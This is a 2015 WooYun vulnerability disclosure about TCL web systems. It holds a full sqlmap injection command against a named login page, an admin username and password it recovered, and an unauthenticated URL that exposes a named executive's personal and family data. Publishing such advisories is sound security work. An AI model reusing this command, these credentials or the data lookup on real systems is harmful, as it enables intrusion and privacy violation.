当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136479

漏洞标题:TCl某站后台SQL注入及某处越权(可查任意员工信息)

相关厂商:TCL官方网上商城

漏洞作者: hecate

提交时间:2015-08-24 14:29

修复时间:2015-10-11 11:34

公开时间:2015-10-11 11:34

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-24: 细节已通知厂商并且等待厂商处理中
2015-08-27: 厂商已经确认,细节仅向厂商公开
2015-09-06: 细节向核心白帽子及相关领域专家公开
2015-09-16: 细节向普通白帽子公开
2015-09-26: 细节向实习白帽子公开
2015-10-11: 细节向公众公开

简要描述:

TCl某站后台SQL注入及某处越权(可查薄总裁一家五口信息)

详细说明:

1.存在注入的地方 http://train.tcl.com.cn/DRP/

sqlmap -u "http://train.tcl.com.cn/DRP/login.action" --data "timeStamp=1440386167174&credential=&userType=Employee&userId=aaa&pwd=aaa&Submit=++%B5%C7++%C2%BD++&TimeStamp=1440386167176&Credential=" -p "userId" --dbs


11.png


22.png


33.png


得到管理员账号 admin
密码 admin!@#2011
2.登录后台,找到李董事长

44.png


55.jpg


3.TCL外事系统管理平台未授权访问
地址 http://wsb.tcl.com/isp/login.aspx
不用登录,知道email账号就可查询信息,直接访问这个链接 http://wsb.tcl.com/isp/vstwebfao/basesetting/PersonEdit.aspx?email=bolm%40tcl.com&type=gr 可以看到薄总裁的信息

66.jpg


家庭成员

77.jpg


修改email试试

88.jpg


99.jpg

漏洞证明:

见详细说明

修复方案:

过滤,上WAF,401

版权声明:转载请注明来源 hecate@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-08-27 11:33

厂商回复:

已转相关同事处理,谢谢

最新状态:

暂无


漏洞评价:

评论

  1. 2015-10-08 23:41 | hecate ( 普通白帽子 | Rank:285 漏洞数:45 | ®高级安全工程师 | WooYun认证√)

    @TCL官方网上商城 任意员工信息查询还没修复